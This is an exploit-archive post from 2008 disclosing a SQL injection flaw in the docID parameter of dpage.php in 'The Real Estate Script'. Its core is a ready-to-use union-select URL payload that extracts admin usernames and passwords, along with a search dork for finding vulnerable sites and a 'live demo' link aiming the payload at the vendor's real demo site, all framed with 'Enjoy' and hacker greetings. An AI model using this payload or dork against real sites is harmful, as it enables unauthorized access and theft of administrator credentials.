The Real Estate Script (dpage.php docID) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : The Real Estate Script (dpage.php docID) SQL Injection Vulnerability
# Published : 2008-05-13
# Author : HaCkeR_EgY
# Previous Title : EMO Realty Manager (news.php ida) SQL Injection Vulnerability
# Next Title : Linkspile (link.php cat_id) Remote SQL Injection Vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########## Remote SQL Injection Vulnerability  ##############
                     Therealestatescript    [ dpage.php ]
#################################################                             
 
[$] Author : HaCkeR_EgY
 
[$] c0nTaCT : hacker_egy@hotmail.com
 
[$] DownlOad : www.therealestatescript.com
 
[$] Price :  The Real Estate Script is on sale for $99.95 $59.95 until June 1st.
====================================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[$] Dork :    inurl:dpage.php?docID
 
[$] ExPLo!T : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin
 
[$] L!ve Demo : http://www.therealestatescript.com/demo/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin
 
--Note-- : Enjoy !!! .............  (:
 
====================================================
 
[$] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[$] Greetz : F!resell , Mohamed el Arab ,Mr.SQL , DaRk MaStEr , H-T Team ,Gold_M , Stack-Terrorist , Jiki Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                        

# www.Syue.com [2008-05-13]